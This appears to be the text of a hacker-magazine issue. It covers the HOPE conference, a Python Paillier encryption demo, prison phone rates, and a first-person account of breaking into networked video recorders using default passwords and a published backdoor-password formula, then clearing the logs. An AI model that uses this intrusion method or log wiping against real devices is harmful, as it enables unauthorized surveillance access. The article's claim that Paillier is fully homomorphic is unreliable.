We’ve admittedly never known when 
to quit. People have been advising us to 
since even before we got started. You may 
be somewhat familiar with the thought 
process: play it safe, don’t make waves, 
lead a comfortable and uneventful life. It 
just wasn’t for us - and, we know, not for 
many of those reading this. 

We’ve faced all kinds of struggles 
and challenges throughout our existence, 
many of which could have tipped the 
balance if we weren’t fairly stubborn and 
we didn’t have support from so many in 
the hacker world. The steady decline of 
the print market, the loss of bookstores, 
distributors who disappeared with our 
money more times than we can count, 
and, of course, increased printing costs. 
To even survive without the help of 
advertisers is a testament to the loyalty 
and the strength of our readers. You make 
the impossible happen - and have for 
some time. 

Then there’s HOPE. This unique 
project has brought together many 
thousands from around the world for 12 
truly amazing conferences in New York. 
We’ve seen it expand steadily over the 
years, as we’ve seen the attendees and 
the hacker community grow, mature, 
and flourish. We don’t have the space to 
list the many uphill battles involved in 
organizing these things, but what we see 
after each event has always filled us with 
tremendous pride. 

Hackers On Planet Earth started as yet 
another crazy idea of how a European-style 
gathering of hackers should also 
be able to happen in the States. Before 
our first conference, the largest hacker 
get-togethers were just that: get-togethers 
mostly of people who already knew each 
other. And those were great and extremely 
important in helping to construct what 
followed. In fact, it was the cancellation 
of one of those intimate gatherings 
(Summercon) in 1994 that led to the birth 
of HOPE as a one-time replacement. 
From that point, the landscape started to 
change and big hacker conferences began 
to spread and thrive. Today, Defcon in Las 
Vegas regularly gets over 20,000 people 
to show up, yet for the most part has 
managed to stay true to the hacker spirit 
that’s been there from the beginning. And 
HOPE made its own history, expanding 
the horizons of what constitutes hacking, 
bringing in speakers like Jello Biafra, 
Daniel Ellsberg, and the Yes Men to join 
hacker legends like Steve Wozniak, Kevin 
Mitnick, and Richard Stallman. Concepts 
and goals like hacktivism, the Tor Project, 
hackerspaces, and SecureDrop all had 
early audiences at HOPE conferences, 
and enthusiastic ones at that. In addition 
to the tech, we mixed in discussions 
of justice and empowerment. Over the 
years, we’ve managed to give the stage 
to well over 1000 speakers. We saw the 
community grow, become more inclusive 
and representative of gender, and open a 
continuing dialogue on how to do better. 
Instead of running from the controversy, 
we openly embraced it - and found that it 
made us stronger. And the best part was 
that most of our attendees really seemed 
to get that. 

Of course, the apparent loss of our 
hotel has really thrown a wrench into 
things. From the beginning, all but one 
of the HOPE conferences has been held 
at the Hotel Pennsylvania in Manhattan. 
Being right in the middle of midtown 
certainly had its advantages. But when we 
were recently confronted with a tripling of 
the price we were paying, we knew that 
HOPE couldn’t remain there, at least not 
without fundamentally changing what 
HOPE was. We never wanted to price 
ourselves out of the reach of many of our 
attendees. Accessibility has always been 
one of our passions and losing that would 
be a really bitter pill to swallow. 

When we broke the news in late July, 
we expected to hear messages of support. 
But we were absolutely floored by the 
amount. What’s more, we were unprepared 
for how many people wanted to support the 
conference regardless of where it was. 
A significant number actually said they 
would prefer it if we weren’t located in 
Manhattan, where everything tends to be 
more expensive. All kinds of ideas have 
been sent to us, including alternative 
venues, conference formats, and logistical 
ideas we had never even thought of before. 
In short, the hacker community helped to 
rejuvenate our passion and motivated us 
to really spare no effort in figuring out 
how we could make this work. 

It’s easy to forget sometimes, even 
when you’re in the midst of it, how 
amazing things can continue to happen 
when the right people are working 
with you. We’re used to being told that 
something is impossible - and then doing 
it anyway. That’s how we’ve felt about 
all of our conferences so far, because 
everyone knew it simply wasn’t possible 
to pull something like that off. But we’ve 
never been particularly practical or big 
fans of constricting rules and conformity. 
This annoys the hell out of some people, 
but we’re fairly used to that reaction to 
most of the things we do. Plus, it’s always 
good to be annoying the right people. 

As we go to press, we’re not yet at 
the stage where we know what’s going 
to happen in the summer of 2020, which 
is when the next HOPE conference was 
supposed to be held. By the time this 
issue comes out, we should have a good 
idea one way or another what the future 
of HOPE will be. So we’re setting a date 
of Monday, October 21st to share this 
information with the world. We will post 
an announcement at www.hope.net and 
www.2600.com on that day. And while we 
can’t say for sure at this point whether this 
will be good or bad news, we can say that 
we've got the very best people working 
on this and that we have the support of so 
many others around the world. And when 
you've got all that on your side, it’s very 
hard for magic not to occur. 
by Thor Mirchandani 


In the modern world, people are becoming more and more dependent on using other people’s 
computers for their storage and computing needs. Cloud technologies, phone apps, and Software 
as a Service (SaaS) are just a few examples of applications that rely on other people’s machines. 

Most people understand the absolute necessity for securing their data in the Cloud and rely on 
using some form of encryption. Unfortunately, encrypting data in transit or on a cloud disk using 
most of the common encryption algorithms is not sufficient to ensure privacy. 

When you browse, view, or manipulate the data, it is decrypted to plain text and becomes 
visible to a sufficiently privileged software program. Can you really know for sure who else is 
using your cloud instance? 

Even on a hardened system, data can be read directly from CPU registers and data buses by a 
motivated attacker. If that sounds far-fetched, this is exactly how hardware hacker extraordinaire 
Bunnie Huang hacked the Xbox! For more frivolous examples, consider the technical underpinnings 
of Kraftwerk’s 1981 song “Pocket Calculator.” If individuals can do it, what are the capabilities 
of more well-funded organizations? 


Fully Homomorphic Encryption 
The bottom line is that to be usable, information encrypted with traditional methods has to be 
visible in plain text at some point, if only for a brief moment. Another way to look at it is that a 
man-in-the-middle attack is always possible as long as the attacker is creative when it comes 
to defining where the “middle” is! 
Does it have to be that way? What if we could reliably manipulate encrypted information 
without ever decrypting it? Turns out that we can. Enter Fully Homomorphic Encryption (FHE). 
FHE is a class of ciphers that have the interesting quality that an arbitrary computation on 
ciphertexts generates an encrypted result which, when decrypted, matches what you would see 
had the same computations been performed on the plaintext. Sounds like black magic, doesn’t it? 
Theoretical FHE systems were postulated in the late 1970s. In the following decades, 
researchers implemented systems that permitted a limited number and limited types of computations. 
Then in 2009, Craig Gentry described a system that could perform any computation, albeit 
very slowly. Basic computations would take hours! But it didn’t take long for Gentry and other 
researchers to come up with implementations many orders of magnitude faster. Those systems are 
finding practical uses today. (Crypto Trivia: Craig Gentry received a MacArthur Genius Award 
for his work on encryption.) 


A Practical SaaS Example 

One application for FHE is SaaS. Alice might have valuable data and Bob might have a valuable 
algorithm. Neither wants to reveal their “secret sauce” to the other. With traditional encryption 
methods, this would not be possible: The algorithm would have to operate on plaintext data, 
and Alice and Bob would have to duke it out regarding who should lift the skirt. Typical solutions 
to the dilemma involve lawyers and NDAs. 

Moments before he took his last breath, Alice’s grandfather gave her three top secret numbers 
that will lead to the map coordinates of the spot where his treasure is hidden. To get the real 
coordinates, Alice must add two of the numbers and multiply the third by a constant. Alas, while 
cryptographically savvy, Alice is arithmetically challenged and has to enlist outside help. 

Fortunately, Bob runs a service that can add and multiply encrypted numbers. Alice agrees to 
send Bob her FHE encrypted numbers. Bob will then perform the calculations on the two numbers 
without ever seeing them in plaintext. Calculations completed, Bob returns the encrypted results 
to Alice without ever seeing the plaintext results. When Alice gets the results, she can simply 
decrypt them to get the coordinates. 

We are implementing this interaction in Python - see the listing for fullyhomo.py that follows 
this article. The code was written for Python 3, but should work fine with Python 2 as well. It will 
run on Ubuntu Linux using any one of the following three commands: 

./fullyhomo.py 
python3 fullyhomo.py 
python fullyhomo.py 

Similar commands are available on Windows. Here is a typical output from running the 
program: 
~/projects/homomorphic$ ./fullyhomo.py 

SaaS Example: 
Alice wants to use Bob’s calculation service to calculate 5 + 10 
She encrypts 5 
...and the encrypted value is 408231311223330758911876050904... 
She then encrypts 10 
...and the encypted value is 6811593647043826157618544194678... 

Alice also wants to to multiply 6 with the constant 3 
She encrypts 6 
...and the encrypted value is 275872367736262799842862895600... 

Then Alice sends the encrypted values to Bob along with her public key 

Bob adds the two encrypted values without knowing what they are 
the encrypted result is 3509690235178988491246734744677382694... 
Bob multiplies the third encrypted value with the constant 
the encrypted result is 8919545079897387397953169089569936011... 

Bob sends the encrypted results back to Alice 
Alice uses her private key to view the plain text results: 
Addition: 15 
Multiplication: 18 


Armed with the coordinates, Alice packs her shovel and books a trip to Niger. Or did he mean 
Mauritania? Or maybe Namibia? Surely the treasure isn’t in the middle of the Atlantic?!?! East 
versus West, North versus South, these things do matter! 


The Code 

The Python code implements an FHE algorithm called the Paillier cryptosystem. To keep 
things brief and simple, the code only implements the operations required for the addition and 
multiplication operations. Also, the key pair is hard coded for the sake of simplicity. A full-fledged 
implementation would provide code to generate random keys. 
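
The key generation that the listing leaves out, as an added example (not the author's code): it builds a fresh Paillier key with g = n + 1, the same form as the hard-coded key, draws all randomness from `secrets`, and replays the article's 5 + 10 and 6 x 3. Paillier is additively homomorphic, so the available operations are adding two ciphertexts and multiplying a ciphertext by a plaintext constant, which is what the treasure example uses; the function names and key sizes are assumptions made for this example.

```python
import math
import secrets   # CSPRNG; Python's random module is not suitable for keys or nonces


def is_probable_prime(n, rounds=40):
    """Miller-Rabin test with random bases."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for _ in range(rounds):
        x = pow(2 + secrets.randbelow(n - 3), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False          # composite witness found
    return True


def random_prime(bits):
    """Random prime with its top two bits set, so p * q has exactly 2 * bits bits."""
    while True:
        cand = secrets.randbits(bits) | (3 << (bits - 2)) | 1
        if is_probable_prime(cand):
            return cand


def keygen(n_bits=2048):
    """Return (pub, priv) with pub = (n, n2, g) and priv = (lam, mu)."""
    while True:
        p, q = random_prime(n_bits // 2), random_prime(n_bits // 2)
        n = p * q
        # Decryption needs gcd(n, (p-1)(q-1)) == 1; distinct equal-size primes satisfy it.
        if p != q and math.gcd(n, (p - 1) * (q - 1)) == 1:
            break
    lam = (p - 1) * (q - 1) // math.gcd(p - 1, q - 1)   # lcm(p-1, q-1)
    g = n + 1                  # same form as the listing's hard-coded g
    mu = pow(lam, -1, n)       # g = n+1 gives L(g^lam mod n^2) = lam mod n (Python 3.8+)
    return (n, n * n, g), (lam, mu)


def encrypt(pub, m):
    n, n2, g = pub
    if not 0 <= m < n:
        raise ValueError("plaintext must be in [0, n)")
    while True:
        r = secrets.randbelow(n)          # fresh blinding value per ciphertext
        if r > 0 and math.gcd(r, n) == 1:
            break
    return pow(g, m, n2) * pow(r, n, n2) % n2


def decrypt(pub, priv, c):
    n, n2, _ = pub
    lam, mu = priv
    return (pow(c, lam, n2) - 1) // n * mu % n


def add(pub, c1, c2):
    """Enc(a) * Enc(b) mod n^2 decrypts to a + b."""
    return c1 * c2 % pub[1]


def mul_const(pub, c, k):
    """Enc(a) ** k mod n^2 decrypts to a * k, for a plaintext constant k."""
    return pow(c, k, pub[1])


def treasure_demo(n_bits=1024):
    """Replay the article's numbers with a fresh key (1024 bits keeps the demo fast)."""
    pub, priv = keygen(n_bits)
    c5, c10, c6 = encrypt(pub, 5), encrypt(pub, 10), encrypt(pub, 6)
    return {
        "addition": decrypt(pub, priv, add(pub, c5, c10)),
        "multiplication": decrypt(pub, priv, mul_const(pub, c6, 3)),
        # Combining two ciphertexts always adds: Enc(6) with Enc(3) gives 9, not 18.
        "enc6_with_enc3": decrypt(pub, priv, add(pub, c6, encrypt(pub, 3))),
        # Fresh r per call: equal plaintexts yield different ciphertexts.
        "randomized": encrypt(pub, 5) != c5,
    }


if __name__ == "__main__":
    print(treasure_demo())
```
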

The class FullyHomoCipher on line 14 is the Paillier encryption code. The class BobsCalculationService 
on line 54 defines the operations for addition and multiplication of Paillier-encrypted 
values. 

Our treasure hunt adventure starts on line 75 and uses the two classes described above. 
It’s extensively commented in order to make it easy for the interested reader to modify and 
experiment. 

A note of caution for readers that aren’t familiar with the Python language: Unlike most 
languages, Python is white-space sensitive, and indentation matters. It’s important to preserve the 
indentation or the program will not execute properly. 


FHE Now and Tomorrow 

Our SaaS example is obviously a toy, but that’s to be expected from about 140 lines of 
commented Python code. More robust, fully featured FHEs built around stronger algorithms are 
finding new applications every day. 

Software as a Service is only one application that’s a good match for FHE. Other types of 
applications include smart contracts, block chain systems, data mining, “vanity” hashes, end-to-end 
encrypted database queries, anonymous identity systems, data integrity verification, and 
so on. With the rapid development in the field, we can expect many other uses in the very near 
future. 

FHE is currently deployed across several industries and problem domains, including electronic 
voting systems, genomics, and payment systems, and we predict widespread adoption in 
areas such as health care, smart power grids, and finance to take place very soon. 


#!/usr/bin/env python3

import random

# Alice's Private/Public key pair, hard coded for simplicity
class PrivateKey():
    lambdA = 73842165240981452554905699590449542088961757004289873177979834078905122488912
    mu = 14623866067924162049758185900912462985982902037214491087468255488155427133263

class PublicKey():
    n = 73842165240981452554905699590449542089513117936657660262085094366199671389241
    n2 = 5452665367476409421070096932669081750981552257584472365472731868555542659457163641469759175897028833132670904633495629764635203858875472896093430930556081
    g = 73842165240981452554905699590449542089513117936657660262085094366199671389242

# Alice's Implementation of a fully homomorphic Paillier cipher
class FullyHomoCipher():
    def __init__(self, a1, b1):
        self.a = a1
        self.b = b1

    # Square-and-multiply modular exponentiation
    def expCalc(self, base, exponent, modulus):
        result = 1
        while exponent > 0:
            if exponent & 1 == 1:
                result = (result * base) % modulus
            exponent = exponent >> 1
            base = (base * base) % modulus
        return result

    # Paillier encryption: g^plain * r^n mod n^2
    # (the random module is not a cryptographic generator; production code
    # would draw r from a CSPRNG)
    def encrypt(self, pub, plain):
        while True:
            r = random.getrandbits(128)
            if r > 0 and r < pub.n:
                break
        x = self.expCalc(r, pub.n, pub.n2)
        cipher = (self.expCalc(pub.g, plain, pub.n2) * x) % pub.n2
        return cipher

    # Paillier decryption: ((cipher^lambda mod n^2) - 1) // n * mu mod n
    def decrypt(self, priv, pub, cipher):
        x = self.expCalc(cipher, priv.lambdA, pub.n2) - 1
        plain = ((x // pub.n) * priv.mu) % pub.n
        return plain

    # Split m into a = m - r (mod n) and b = Encrypt(r)
    def encrypt_message(self, pub, m):
        r = random.randrange(256, pub.n)
        b = self.encrypt(pub, r)
        a = (m - r) % pub.n
        self.a = a
        self.b = b

    # Recombine: m = a + Decrypt(b) (mod n)
    def decrypt_message(self, priv, pub):
        val = (self.a + self.decrypt(priv, pub, self.b)) % pub.n
        return val

# Bob's encrypted calculation service
class BobsCalculationService():

    # Add two encrypted numbers
    def encrypted_add(self, pub, a, b):
        return a * b % pub.n2

    def sum(self, c1, c2, pub):
        a = (c1.a + c2.a) % pub.n
        b = self.encrypted_add(pub, c1.b, c2.b)
        c = FullyHomoCipher(a, b)
        return c

    # Multiply two encrypted numbers with a constant (Bob)
    def encrypted_mult(self, pub, a, n):
        return FullyHomoCipher(-1, -1).expCalc(a, n, pub.n2)

    def product(self, const, c1, pub):
        a = (c1.a * const) % pub.n
        b = self.encrypted_mult(pub, c1.b, const)
        c = FullyHomoCipher(a, b)
        return c

# THE SAAS EXAMPLE BEGINS HERE
if __name__ == '__main__':

    # Alice's Key Pair
    pub = PublicKey
    priv = PrivateKey

    # The top secret numbers Alice wants to use
    secretNumber1 = 5
    secretNumber2 = 10
    secretNumber3 = 6
    const = 3

    # The Cipher objects Alice uses for encryption
    alice1 = FullyHomoCipher(-1, -1)
    alice2 = FullyHomoCipher(-1, -1)
    alice3 = FullyHomoCipher(-1, -1)

    # Alice performs encryption
    print("SaaS Example:")
    print("Alice wants to use Bob's calculation service to calculate ",
          secretNumber1, "+", secretNumber2)
    print("She encrypts ", secretNumber1)
    alice1.encrypt_message(pub, secretNumber1)
    print("...and the encrypted value is ", alice1.a, alice1.b)
    print("She then encrypts ", secretNumber2)
    alice2.encrypt_message(pub, secretNumber2)
    print("...and the encypted value is ", alice2.a, alice2.b)
    print("")
    print("Alice also wants to to multiply ", secretNumber3, " with the constant ", const)
    print("She encrypts ", secretNumber3)
    alice3.encrypt_message(pub, secretNumber3)
    print("...and the encrypted value is ", alice3.a, alice3.b)
    print("")
    print("Then Alice sends the encrypted values to Bob along with her public key")
    print("")

    # These are the encrypted values Alice sends to Bob
    encr1_a = alice1.a
    encr1_b = alice1.b
    encr2_a = alice2.a
    encr2_b = alice2.b
    encr3_a = alice3.a
    encr3_b = alice3.b

    # Bob rebuilds cipher objects from what he received; he does not
    # have the private key
    bob1 = FullyHomoCipher(encr1_a, encr1_b)
    bob2 = FullyHomoCipher(encr2_a, encr2_b)
    bob3 = FullyHomoCipher(encr3_a, encr3_b)

    # Addition
    print("Bob adds the two encrypted values without knowing what they are")
    result1 = BobsCalculationService().sum(bob1, bob2, pub)
    print("the encrypted result is ", result1.a, result1.b)

    # Multiplication
    print("Bob multiplies the third encrypted value with the constant")
    result2 = BobsCalculationService().product(const, bob3, pub)
    print("the encrypted result is ", result2.a, result2.b)
    print("")

    print("Bob sends the encrypted results back to Alice")
    print("Alice uses her private key to view the plain text results:")
    print("Addition: ", result1.decrypt_message(priv, pub))
    print("Multiplication: ", result2.decrypt_message(priv, pub))
by Ray Keck 


I have always taken an interest in hacking/ 
phreaking, but never applied anything I have 
learned (for either good or evil purposes)... 
until recently, that is. A couple years ago I 
started working for a manufacturer who sold 
home security equipment (network video 
recorders, IP cameras, etc.). I have had some 
experience with older analog systems in the 
past, but this would be my first foray into 
the IP based world. I was one of three people 
working in tech support helping installers and, 
on occasion, end users with technical issues. It 
wasn’t the greatest work to be doing (as tech 
support typically isn’t), but it was a decent 
paycheck and close to home. 

During my time of employment with the 
company, I had a lot of time to think about and 
evaluate the security of the equipment we were 
selling. We billed ourselves as a manufacturer 
to the customer, but this wasn’t exactly true. 
The truth was that we purchased hardware 
from a Chinese manufacturer and rebranded 
it with our own logo. We also customized the 
firmware that was being flashed to the equipment. 
This information wasn’t publicized, and 
we made it a point not to talk about it with 
clients, even if they had brought it up themselves. 
Sounds like a great business to work 
for, huh? 

Right off the bat, this job had already felt 
suspect to me. While shady business practices 
do not necessarily translate to bad product, it 
was the cheaply manufactured Chinese hardware 
(or rather the embedded software) that 
was the issue. This was particularly evident 
to me about once a year when we would go 
through a flood of calls regarding hacked 
machines and user accounts. The reason these 
machines would get hacked so frequently 
was because of vulnerabilities found in the 
firmware. 

This, of course, isn’t anything new to 
technology. It has always been a cat and 
mouse game between hackers and firmware 
developers since the dawn of time. Take, for 
example, the Xbox 360 when hackers modified 
DVD-ROM firmware to play game backups 
on their machines. Microsoft threw everything 
they could at people modifying their consoles 
to thwart these attempts. But what resulted 
was a back and forth game between both 
parties involved, with Microsoft continuously 
patching, updating, and swapping hardware. 
The difference here is that the cheap Chinese 
manufacturer put forth much less of an effort 
to secure their products. 

For years they used very simple algorithms 
to generate backdoor passwords with information 
that was widely available on the Internet 
to those who were interested. The backdoors 
were intended for people who forgot their 
passwords. But rather than give them a way to 
do it on their own (like a password reset link 
on the web interface landing page), all they 
had to do was call us. The backdoor codes 
were generated something like this: 8888 x 
day x month x year, the last six digits were the 
password. We only generated those backdoor 
passwords for installers and law enforcement, 
which was supposed to curb them from falling 
into the wrong hands. 


This was a fine idea in the beginning, but 
ended up being half-baked in the end. This was 
because we had no way to verify the identity 
of the person calling. Anyone could call in 
and say that I am “Mr SoAndSo” with “Fake- 
Company” and tell us “I need a backdoor for 
Serial Number xxxxx” and they would have 
no trouble getting it. This, of course, has since 
been patched with stronger algorithms to keep 
people from generating their own passwords. 
But people calling in to get passwords still 
remained an issue. Oftentimes when companies 
install security equipment, they leave default 
settings on them. Way too many calls started 
out with “I can’t get into my NVR anymore 
using the credentials of admin:admin.” Is this 
an end user problem? Sure it is, to an extent. 
But when installers lack the technical knowledge 
to actually set the equipment up properly, 
there is more of an underlying issue here. 

One day I was curious as to how many of 
these machines were out there - machines that 
still were using default passwords or hadn’t had 
patched firmware applied to them. I wanted to 
see if I could hack into some of them for fun and 
to show my company how flimsy the security 
actually was. One defect with these machines 
is that firmware updates are applied manually, 
which means that only people who have called 
us have had their machines updated. The firmware 
for these devices is not available publicly, 
which further cements the fact that there are 
still many machines sitting in the wild unprotected. 
Anyone familiar with modern security 
equipment is probably aware that they come 
with a feature called P2P (or peer-to-peer). 
This allows people with little or no networking 
knowledge to set up their equipment for remote 
access by scanning a 2D barcode or inputting 
the serial number into some software so that 
they can view their cameras remotely. Fortunately 
for me, the serial numbers were created 
sequentially, which made it easy to find potential 
targets by running through them in order. 

I started with a known serial number and 
incremented it by one every time I made 
a login attempt. The admin account on the 
machines cannot be deleted (another vulnerability), 
so that all I had to worry about was 
getting the password correct. I started by 
trying the default password of “admin” first. 
If I couldn’t get in this way, I would then try 
generating a backdoor. The backdoor passwords 
were supposed to be local access only, 


and didn’t work through the web interface, 
so all logins that I performed were using the 
client software (yet another vulnerability). 

I found that after several attempts on 30 
different machines, I was able to successfully 
get into six of them. This is definitely a 
high enough number to raise some concern to 
management (or so I thought). I cleared the 
event logs on the systems before exiting so 
that any evidence of my entry was removed. 
White hatters will sometimes change the 
OSD (on screen display) to display something 
like “HACKED” so that the user is aware of 
what happened without ever taking complete 
control. It also serves as a warning of potential 
danger if the problem is left ignored. 

In theory, I probably could have maintained 
access to these machines for months, or even 
years if I were inclined to do so. But I chose 
to leave things alone and never again log into 
those machines. This only served as sort of 
a “proof of concept” approach to show how 
easily it could be done. 

After bringing my concerns to the attention 
of the higher-ups, it was fluffed off as a known 
issue that was being worked on. My suggestion 
was to have the machines auto-update 
firmware on the fly, but this kind of functionality 
seemed like too much trouble to incorporate. 
Little has changed, and even to this day it 
is still easy to break into these machines. 

In closing, I just wanted to emphasize that 
there are things that can be done to secure these 
machines so that any risk involved is minimal. 
Updating firmware, closing ports, and 
disabling P2P are all effective ways to beef up 
security. Make sure that your equipment is also 
behind a firewall. And finally, check event logs 
often. Most hackers don’t bother to clear them 
when they are finished with their dirty work. A 
lot of home routers keep records of this kind of 
activity as well. If you absolutely have to keep 
ports open, avoid using port 80 for http traffic 
and don’t use default TCP settings. Also, variants 
of port 80 are bad (8080, 8000, etc.) and 
shouldn’t be used either. Keep in mind that 
http ports aren’t usually required for viewing, 
but for remote management purposes only. 

When a security company can’t seem to 
get “security” right, it makes you question 
how secure anything really is. But what makes 
this so significant is that it is an invasion of 
privacy, a scary reality of the modern world, 
and it has to make one ponder the question: 
“Who is watching us?” 
by The Prophet 


Hello, and greetings from the Central Office! 
It’s moving day, by which I mean another filthy 
CLEC, hanging on by its fingernails for years, has 
finally gone out of business and is moving their 
junky old equipment out. Of course, we were kind 
enough to provide their customers with uninterrupted 
service by taking over their accounts. 
Naturally, we’re charging them full price as well, 
which - surprisingly - is cheaper in some cases 
than what the CLEC was charging them. 

Our wholesale rates to filthy CLECs are based 
on a fixed percentage discount off our regulated 
rates. The discount varies depending upon the 
level of services we provide on behalf of the 
CLEC (such as operator services, repair service, 
whether they use our switch or their own, and 
even whether they do their own billing or have 
us do it). The CLEC is always responsible for 
paying us; if their customer fails to pay, it isn’t 
supposed to be our problem. This particular 
CLEC, however, sold services without collecting 
a deposit, below cost, to a lot of marginal and 
startup businesses who just weren’t very good at 
paying their bills. It turns out this is not a good 
business model. Over time, the CLEC became 
not very good at paying our bills, which eventually 
resulted in a protracted negotiation. They 
were expert at paying just enough that, under the 
state tariffs, we had to continue providing them 
service, but not enough to ever have a profitable 
business or ever fix anything that was wrong with 
their network. 

Over the years, we have managed to move 
many of our services out of the “regulated” side 
of the house to the “unregulated” side. Essentially, 
any modern broadband, or service delivered via 
the modern broadband network, is unregulated 
which means that we aren’t required to file rates, 
comply with tariffs, or provide services anywhere 
that isn’t convenient for us to do so (sorry, but 
you won’t be getting 100Mbps Internet at your 
trailer a few miles outside of Tenino - we’ll sell 
you a POTS line and you can try dial-up instead). 
Additionally, depending upon the state, traditional 
wireline services bundled with modern 
broadband services are also often unregulated, 
meaning we can undercut CLECs wholesale (get 
it?). They aren’t entitled to share these networks 
(thanks, FCC!) and they aren’t tariffed so they 
can’t receive a discount. In fact, they don’t have 
access to these services from us at all. So, as 
more and more telephony has moved to VoIP 
and is carried over broadband networks, CLECs 
have found it harder and harder to compete. And 
for my part, that’s just fine because it means job 
security! 

Speaking of tariffed rates, I’ve been getting 
a lot of phone calls from a federal prison lately 
at truly astronomical rates. The Felon is currently 
incarcerated there, and for some reason, she has 
my phone number. I must be the only person left 
who picks up the phone from numbers where 
Caller ID is blocked. Federal prisons charge the 
prisoner an FCC-regulated rate of 21 cents per 
minute for long distance calls, and six cents per 
minute for local calls. These are rates we haven’t 
seen outside of prisons since the 1990s, but they 
are actually considered low for jails and prisons 
where rates can exceed $1 per minute. 

In 2013, the FCC was making good progress 
on cracking down. Two prison phone providers 
dominate the jail and prison phone market: Global 
Tel*Link (aka GTL) and Securus. These companies 
make the slimiest COCOT provider look 
legitimate. Many telecommunications contracts 
negotiated by these providers offered a revenue 
share with jails and prisons (yes, including 
privately operated, for-profit prisons). This 
created an incentive for prison phone companies 
to charge high fees and per-minute pricing 
and imposed - in effect - a tax on the families of 
inmates. 

Bowing to political pressure in 2013, after a 
series of proposed rulemakings, the FCC initially 
capped rates on interstate calls at 21 cents per 
minute for prepaid calls, and 25 cents per minute 
for collect calls. In 2015, prison phone providers 
were further restricted to maximum charges on 
the following ancillary fees: 

* Taxes and regulatory fees: Actual tax rate with no markup 
* Automated payment fees (via phone system, website, or kiosk): $3.00 
* Live agent fee (wherein a live agent processes a payment): $5.95 
* Paper bill/statement fee: $2.00 
* Third-party financial transaction fee (such as Western Union): Pass-through at actual cost. 

The FCC also imposed some rules around 
creating prepaid accounts. In order to avoid 
game playing to generate excessive payment 
fees, prison phone providers weren’t allowed to 
impose a prepaid account maximum below $50. 

In 2015, the FCC also set lower maximum 
rates: 

* State or federal prisons: 11 cents/minute 
* Jails with 1,000 or more inmates: 14 cents/minute 
* Jails with 350-999 inmates: 16 cents/minute 
* Jails of up to 349 inmates: 22 cents/minute 

The prison phone providers immediately 
sued, and the court granted a stay of the new rates 
going into effect. Accordingly, rates were frozen 
at the 2013 interstate rates. 

In 2016, the FCC adjusted its proposed 
maximum interstate rates, in an attempt to moot 
the earlier litigation: 

* State or federal prisons: 13 cents/minute 
* Jails with 1,000 or more inmates: 19 cents/minute 
* Jails with 350-999 inmates: 21 cents/minute 
* Jails of up to 349 inmates: 31 cents/minute 

The effort didn’t work. Prison phone 
providers again immediately sued, and the court 
again granted a stay of the new rates going into 
effect. Accordingly, rates remained frozen at the 
2013 interstate rates. 

As you can see, the FCC has been thwarted 
at every turn in attempting to regulate price 
gouging rates and, in addition, they left some big 
loopholes which prison phone providers have 
exploited to make more money. First of all, the 
cost of intrastate calls wasn’t regulated (because 
the FCC lacks authority over intrastate calls), 
meaning that the majority of calls from jails and 
state prisons aren’t at FCC-regulated rates. This 
doesn’t mean the rates aren’t regulated, but it’s 
left to the states, some of which are better than 
others. Additionally, payment fees are allowed 
to be charged per call, even though you can also 
set up an account with the prison phone provider 
(the FCC requires them to allow this) and make a 
deposit on your account in order to avoid multiple 
payment fees. 

There are some other tricks as well. Many 
people receiving calls from jails and prisons are 
living on the economic margins, so they make 
payments via Western Union, MoneyGram, etc.
The payment providers charge a higher fee than 
normal for payments to prison phone accounts, so 
they can rebate a portion of the fee to the prison 
phone provider. Additionally, some prison phone 
providers have invented additional services 
such as voicemail, for which they charge extra, 
unregulated rates. Finally, services such as video 
calling (which has replaced in-person visitation 
at many facilities) cost whatever prison phone 
providers want to charge. 

Kickbacks are rife in the industry, despite the 
obvious conflict of interest. The Prison Policy 
Initiative discovered some common patterns of 
kickbacks: 

* Paying the facility a “signing bonus” for the 
contract. 

* Paying annual or monthly “administrative
fees.”

* Providing phone-related technology, like
cell-phone jamming equipment or call recording
equipment.

* Providing computer equipment for corrections
staff, law libraries, and religious services.

* Paying exorbitant “rent” for the vendor's
equipment at a correctional facility.

In addition to this, suspiciously timed 
campaign donations and donations to police- 
affiliated organizations have been made by prison 
phone providers. And naturally, jails and prisons 
that were charging commissions (which have 
fallen out of political favor) have been caught 
inventing new fees that involve almost exactly 
the same amount of money previously collected 
from prison phone providers in the form of 
commissions. 

It is against this backdrop that there is an 
epidemic of smuggled cell phones found in 
prisons. The higher prison phone rates go, it 
seems the more willing prisoners are to take the 
risk of being caught with contraband. It doesn’t 
really make much sense to me that prisoners 
aren’t allowed to use mobile phones. Using 
microcells alongside features already deployed 
in law enforcement “stingray” technology, 
substantially all of the security features currently 
available from prison phone providers could be 
applied to mobile phones. However, this wouldn't 
make jails, prisons, or prison phone providers any 
money, so the friends and family of prisoners will 
continue paying - in effect - a “prison tax.” 

And with that, it’s time to rake some leaves. 
Have a lovely autumn, and I'll see you again in 
the winter! 

The Internet today feels very open and
accessible. But the Internet seems to have lost 
its mystery and charm. Before, you never knew 
what you would run into - you could search a 
new term and find a fan site completely dedi- 
cated to the topic. Search “canadian owls” 
and you might find a website created by a 
researcher, someone who had spent years of 
their life perfecting their research and knowl- 
edge, someone who had spent hours and 
hours creating this Internet-accessible portal 
into their depth of knowledge. But today, that 
feeling and mystery is almost completely gone. 
Search “canadian owls” and what are you 
greeted with? Many large websites operated by 
foundations and companies. Sure, they have 
encyclopedia-like information on the topic, but 
there’s no personal touch. There’s no author 
to contact, there’s no one you could have an 
email correspondence with, asking them ques- 
tions about owls. Instead, you’re presented 
with plastic-feeling template websites with 
information collected from various sources 
and papers. If there’s an author’s touch, you'd 
never know because none of the pages are 
signed. 

While this is optimal for getting informa- 
tion out of the Internet, you’re missing the 
human touch. You’re missing the personal-
ization that made you say, “Wow, I’m on Dr. 
Orton’s owl website!” You’re missing those 
strange owl gifs that Dr. Orton seemed to 
insert in the background of all of her pages - 
the patterned backgrounds that never really 
seemed to fit the design of the site, but you 
would miss them if they were gone. 

It’s like going to a McDonald’s instead of 
your local family eatery. Sure, you may be 
able to read their menu a bit clearer, and you’re 
able to receive your food more efficiently, 
but there’s no personality. You don’t have a 
favorite McDonald’s cashier. You don’t get 
to know the owner, and you don’t get to taste 
the personal cooking of the guy running the 
kitchen. There are no types of food from the
owner’s country, and there are no recipes that 
have been passed down for generations. And 
let’s not forget the reason McDonald’s is like 
that: they’re trying to make a profit. They’re 
